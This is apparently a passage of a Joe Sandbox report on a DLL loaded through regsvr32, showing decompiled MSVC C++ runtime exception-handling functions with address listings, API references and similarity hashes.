Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: P_mo
API String ID: 776569668-2163724304
Opcode ID: 70f7f1ed1c716a81b00a91d5eb2127c395675239029dd6b094fb8710ca4e6947
Instruction ID: 24ba3dc2df4fbcdc749466567a8becfdb18b565280ad85d8a6a37d138661f2f9
Opcode Fuzzy Hash: 70f7f1ed1c716a81b00a91d5eb2127c395675239029dd6b094fb8710ca4e6947
Instruction Fuzzy Hash: 0B21CBB6940208AFCB01DF94C840DDD7BBDFF48244F0041A6F6699B160DB71EA45CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CB0CB Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6F6CB0CB(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6F6CC03D(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6F6CD547(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6F6CAD86(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6F6CAD86(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6F6CA645(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6F6CA578(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6F6CB04B(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6F6CD547(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6F6CAD86(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6F6CAD86(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6F6CAD86(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6F6CAD86(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6F6CA578(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6F6CB04B(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6F6CAB2E(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6F6CAD86(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6F6CBADA(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6F6CAD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6F6CAD86(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6F6CAD86(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6F6CAD86(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6F6CBADA(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6F6CD3B8(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6F6CB76E( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6f6dc920) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6F6CAB2E(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6F6CB756( &_v64);
											E6F6CA50C( &_v64, 0x6f6da7ac);
											L63:
											 *(E6F6CAD86(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6F6CAD86(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6F6CA76B(_t279, _t319, _t274);
											E6F6CB9DA(_a8, _a16, _t305);
											_t235 = E6F6CBB97(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6F6CB951(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}

0x6f6cb0cb
0x6f6cb0d2
0x6f6cb0d4
0x6f6cb0dd
0x6f6cb0e3
0x6f6cb0eb
0x6f6cb0ed
0x6f6cb0f0
0x6f6cb0f6
0x6f6cb46f
0x6f6cb46f
0x6f6cb474
0x6f6cb476
0x6f6cb478
0x6f6cb47b
0x6f6cb47c
0x6f6cb47f
0x6f6cb485
0x6f6cb5a4
0x6f6cb48b
0x6f6cb48b
0x6f6cb48c
0x6f6cb48d
0x6f6cb494
0x6f6cb497
0x6f6cb49a
0x6f6cb4a0
0x6f6cb4a2
0x6f6cb4a7
0x6f6cb4aa
0x6f6cb4ac
0x6f6cb4b2
0x6f6cb4b4
0x6f6cb4ba
0x6f6cb4cf
0x6f6cb4d4
0x6f6cb4d7
0x6f6cb4d9
0x6f6cb5a0
0x00000000
0x6f6cb5a1
0x6f6cb4d9
0x6f6cb4ba
0x6f6cb4b2
0x6f6cb4aa
0x6f6cb4df
0x6f6cb4e2
0x6f6cb4e5
0x6f6cb4e8
0x6f6cb4eb
0x6f6cb4f1
0x6f6cb503
0x6f6cb508
0x6f6cb50b
0x6f6cb50e
0x6f6cb511
0x6f6cb514
0x6f6cb517
0x6f6cb51a
0x00000000
0x00000000
0x6f6cb520
0x6f6cb520
0x6f6cb523
0x6f6cb526
0x6f6cb535
0x6f6cb536
0x6f6cb536
0x6f6cb538
0x6f6cb53b
0x00000000
0x00000000
0x6f6cb53d
0x6f6cb540
0x00000000
0x00000000
0x6f6cb54e
0x6f6cb550
0x6f6cb553
0x6f6cb555
0x6f6cb55d
0x6f6cb55d
0x6f6cb560
0x6f6cb562
0x6f6cb564
0x6f6cb580
0x6f6cb585
0x6f6cb588
0x6f6cb588
0x00000000
0x6f6cb560
0x6f6cb557
0x6f6cb55b
0x00000000
0x00000000
0x00000000
0x6f6cb58b
0x6f6cb58e
0x6f6cb58f
0x6f6cb592
0x6f6cb595
0x6f6cb598
0x6f6cb59b
0x6f6cb59b
0x00000000
0x6f6cb526
0x6f6cb5a5
0x6f6cb5aa
0x6f6cb5ab
0x6f6cb5ae
0x6f6cb5b1
0x6f6cb5b2
0x6f6cb5b3
0x6f6cb5b4
0x6f6cb5b7
0x6f6cb5b9
0x6f6cb631
0x6f6cb633
0x6f6cb633
0x6f6cb5bb
0x6f6cb5bb
0x6f6cb5be
0x6f6cb5c1
0x00000000
0x6f6cb5c3
0x6f6cb5c3
0x6f6cb5c6
0x6f6cb5c9
0x6f6cb5d0
0x6f6cb5d0
0x6f6cb5d3
0x6f6cb5d5
0x6f6cb5d7
0x6f6cb609
0x6f6cb609
0x6f6cb60c
0x6f6cb613
0x6f6cb613
0x6f6cb616
0x6f6cb619
0x6f6cb620
0x6f6cb620
0x6f6cb623
0x6f6cb62a
0x6f6cb62c
0x6f6cb62c
0x6f6cb625
0x6f6cb625
0x6f6cb628
0x00000000
0x00000000
0x6f6cb628
0x6f6cb61b
0x6f6cb61b
0x6f6cb61e
0x00000000
0x00000000
0x6f6cb61e
0x6f6cb60e
0x6f6cb60e
0x6f6cb611
0x00000000
0x00000000
0x6f6cb611
0x6f6cb62d
0x6f6cb5d9
0x6f6cb5d9
0x6f6cb5d9
0x6f6cb5dc
0x6f6cb5dc
0x6f6cb5de
0x6f6cb5e0
0x00000000
0x00000000
0x6f6cb5e2
0x6f6cb5e4
0x6f6cb5f8
0x6f6cb5f8
0x6f6cb5e6
0x6f6cb5e6
0x6f6cb5e9
0x6f6cb5ec
0x00000000
0x6f6cb5ee
0x6f6cb5ee
0x6f6cb5f1
0x6f6cb5f4
0x6f6cb5f6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6cb5f6
0x6f6cb5ec
0x6f6cb601
0x6f6cb601
0x6f6cb603
0x00000000
0x6f6cb605
0x6f6cb605
0x6f6cb605
0x00000000
0x6f6cb603
0x6f6cb5fc
0x6f6cb5fe
0x6f6cb5fe
0x00000000
0x6f6cb5fe
0x6f6cb5cb
0x6f6cb5cb
0x6f6cb5ce
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6cb5ce
0x6f6cb5c9
0x6f6cb5c1
0x6f6cb634
0x6f6cb638
0x6f6cb638
0x6f6cb105
0x6f6cb105
0x6f6cb10e
0x6f6cb20b
0x6f6cb20b
0x6f6cb20e
0x00000000
0x6f6cb13d
0x6f6cb13d
0x6f6cb142
0x00000000
0x6f6cb148
0x6f6cb148
0x6f6cb150
0x6f6cb409
0x6f6cb40d
0x6f6cb156
0x6f6cb15b
0x6f6cb15e
0x6f6cb163
0x6f6cb16a
0x6f6cb16f
0x00000000
0x6f6cb1a7
0x6f6cb1af
0x6f6cb213
0x6f6cb213
0x6f6cb216
0x6f6cb219
0x6f6cb21b
0x6f6cb21e
0x6f6cb221
0x6f6cb227
0x6f6cb3d8
0x6f6cb3d8
0x6f6cb3db
0x00000000
0x6f6cb3dd
0x6f6cb3dd
0x6f6cb3e0
0x00000000
0x6f6cb3e6
0x6f6cb3e6
0x6f6cb3e9
0x6f6cb3ec
0x6f6cb3ed
0x6f6cb3ee
0x6f6cb3f1
0x6f6cb3f2
0x6f6cb3f5
0x6f6cb3f6
0x6f6cb3fb
0x00000000
0x6f6cb3fb
0x6f6cb3e0
0x6f6cb22d
0x6f6cb22d
0x6f6cb231
0x00000000
0x6f6cb237
0x6f6cb237
0x6f6cb23e
0x6f6cb256
0x6f6cb256
0x6f6cb259
0x6f6cb25c
0x6f6cb262
0x6f6cb272
0x6f6cb277
0x6f6cb27a
0x6f6cb27d
0x6f6cb280
0x6f6cb283
0x6f6cb286
0x6f6cb289
0x6f6cb28f
0x6f6cb28f
0x6f6cb292
0x6f6cb295
0x6f6cb2a4
0x6f6cb2a5
0x6f6cb2a5
0x6f6cb2a7
0x6f6cb2aa
0x6f6cb2b0
0x6f6cb2b3
0x6f6cb2b9
0x6f6cb2bb
0x6f6cb2be
0x6f6cb2c1
0x6f6cb2ca
0x6f6cb2cd
0x6f6cb2cf
0x6f6cb2cf
0x6f6cb2d2
0x6f6cb2d5
0x6f6cb2d8
0x6f6cb2db
0x6f6cb2de
0x6f6cb2e3
0x6f6cb2e4
0x6f6cb2e5
0x6f6cb2e6
0x6f6cb2e7
0x6f6cb2ea
0x6f6cb2ec
0x6f6cb2ee
0x00000000
0x6f6cb2f0
0x6f6cb2f0
0x6f6cb2f0
0x6f6cb2f3
0x6f6cb2f6
0x6f6cb2f8
0x6f6cb2f9
0x6f6cb2fe
0x6f6cb301
0x6f6cb303
0x00000000
0x00000000
0x6f6cb305
0x6f6cb306
0x6f6cb309
0x6f6cb30b
0x00000000
0x6f6cb30d
0x6f6cb30d
0x6f6cb310
0x6f6cb313
0x00000000
0x6f6cb313
0x00000000
0x6f6cb30b
0x6f6cb327
0x6f6cb32d
0x6f6cb34a
0x6f6cb34f
0x6f6cb34f
0x6f6cb352
0x6f6cb352
0x00000000
0x6f6cb316
0x6f6cb316
0x6f6cb317
0x6f6cb31a
0x6f6cb31d
0x6f6cb320
0x6f6cb320
0x00000000
0x6f6cb325
0x6f6cb2c1
0x6f6cb2b3
0x6f6cb355
0x6f6cb358
0x6f6cb359
0x6f6cb35c
0x6f6cb35f
0x6f6cb362
0x6f6cb365
0x6f6cb365
0x6f6cb36e
0x6f6cb371
0x6f6cb371
0x6f6cb289
0x6f6cb374
0x6f6cb378
0x6f6cb37a
0x6f6cb37d
0x6f6cb383
0x6f6cb383
0x6f6cb38b
0x6f6cb390
0x6f6cb3fe
0x6f6cb3fe
0x6f6cb403
0x6f6cb407
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6cb392
0x6f6cb392
0x6f6cb396
0x6f6cb3a8
0x6f6cb3ab
0x6f6cb3ae
0x6f6cb3b0
0x6f6cb3c7
0x6f6cb3cb
0x6f6cb3d1
0x6f6cb3d2
0x6f6cb3d4
0x00000000
0x6f6cb3d6
0x00000000
0x6f6cb3d6
0x6f6cb3b2
0x6f6cb3b7
0x6f6cb3ba
0x6f6cb3bf
0x6f6cb3c2
0x00000000
0x6f6cb3c2
0x6f6cb398
0x6f6cb39b
0x6f6cb39e
0x6f6cb3a0
0x00000000
0x6f6cb3a2
0x6f6cb3a2
0x6f6cb3a6
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6cb3a6
0x6f6cb3a0
0x6f6cb396
0x6f6cb240
0x6f6cb240
0x6f6cb247
0x00000000
0x6f6cb249
0x6f6cb249
0x6f6cb250
0x00000000
0x00000000
0x00000000
0x00000000
0x6f6cb250
0x6f6cb247
0x6f6cb23e
0x6f6cb231
0x6f6cb1b1
0x6f6cb1b9
0x6f6cb1bc
0x6f6cb1c1
0x6f6cb1c5
0x6f6cb1c8
0x6f6cb1ce
0x6f6cb1d1
0x00000000
0x6f6cb1d3
0x6f6cb1d3
0x6f6cb1d6
0x6f6cb1d8
0x6f6cb40e
0x6f6cb40e
0x00000000
0x6f6cb1de
0x6f6cb1e6
0x6f6cb1f1
0x00000000
0x00000000
0x6f6cb1fa
0x6f6cb1fd
0x6f6cb1fe
0x6f6cb201
0x6f6cb203
0x00000000
0x6f6cb209
0x00000000
0x6f6cb209
0x00000000
0x6f6cb203
0x6f6cb1de
0x6f6cb413
0x6f6cb413
0x6f6cb415
0x6f6cb416
0x6f6cb41d
0x6f6cb420
0x6f6cb42e
0x6f6cb433
0x6f6cb438
0x6f6cb43b
0x6f6cb440
0x6f6cb443
0x6f6cb446
0x6f6cb448
0x6f6cb44a
0x6f6cb44a
0x6f6cb44f
0x6f6cb45b
0x6f6cb461
0x6f6cb466
0x6f6cb469
0x6f6cb46a
0x00000000
0x6f6cb46a
0x6f6cb1d1
0x6f6cb1af
0x6f6cb16f
0x6f6cb150
0x6f6cb142
0x6f6cb10e

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6F6CB1C8
type_info::operator==.LIBVCRUNTIME ref: 6F6CB1EA
___TypeMatch.LIBVCRUNTIME ref: 6F6CB2F9
IsInExceptionSpec.LIBVCRUNTIME ref: 6F6CB3CB
_UnwindNestedFrames.LIBCMT ref: 6F6CB44F
CallUnexpected.LIBVCRUNTIME ref: 6F6CB46A

Strings

csm, xrefs: 6F6CB108
csm, xrefs: 6F6CB175
csm, xrefs: 6F6CB221

Memory Dump Source

Source File: 00000019.00000002.665782450.000000006F6C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F6C0000, based on PE: true

Associated: 00000019.00000002.665775734.000000006F6C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665829052.000000006F6D5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665868726.000000006F6DC000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000019.00000002.665891961.000000006F6DE000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_6f6c0000_regsvr32.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 18263beb7a46e1d791a6d8468b61ae38893bd78e6af936544fe1eeb39d2ab635
Instruction ID: 290883e825d89d365eeb550c4de4f74842a04ec43bb169ee130e13e0ab871813
Opcode Fuzzy Hash: 18263beb7a46e1d791a6d8468b61ae38893bd78e6af936544fe1eeb39d2ab635
Instruction Fuzzy Hash: 4BB18531C00209EFCF05CFA4D980A9EBBB5FF05314F00816AE894AB251D735EA61CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 6F6CA9D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E6F6CA9D0(void* __ecx, signed int __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t68;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t78;
				intOrPtr _t80;
				signed int _t83;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr _t91;
				signed int _t94;
				char _t96;
				signed int _t102;
				signed int _t103;
				signed int _t110;
				void* _t111;
				intOrPtr _t112;
				signed int _t113;
				signed int _t115;
				void* _t116;
				void* _t117;
				void* _t123;

				_t107 = __edx;
				_t90 = _a4;
				_v5 = 0;
				_v16 = 1;
				 *_t90 = E6F6D4630(__ecx,  *_t90);
				_t91 = _a8;
				_t6 = _t91 + 0x10; // 0x11
				_t113 = _t6;
				_push(_t113);
				_v20 = _t113;
				_v12 =  *(_t91 + 8) ^  *0x6f6dc024;
				E6F6CA990(_t91, __edx, _t111, _t113,  *(_t91 + 8) ^  *0x6f6dc024);
				E6F6CBBFC(_a12);
				_t68 = _a4;
				_t117 = _t116 + 0x10;
				_t112 =  *((intOrPtr*)(_t91 + 0xc));
				if(( *(_t68 + 4) & 0x00000066) != 0) {
					__eflags = _t112 - 0xfffffffe;
					if(_t112 != 0xfffffffe) {
						_t107 = 0xfffffffe;
						E6F6CBDF0(_t91, 0xfffffffe, _t113, 0x6f6dc024);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t68;
					_v28 = _a12;
					 *((intOrPtr*)(_t91 - 4)) =  &_v32;
					if(_t112 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t94 = _v12;
							_t75 = _t112 + (_t112 + 2) * 2;
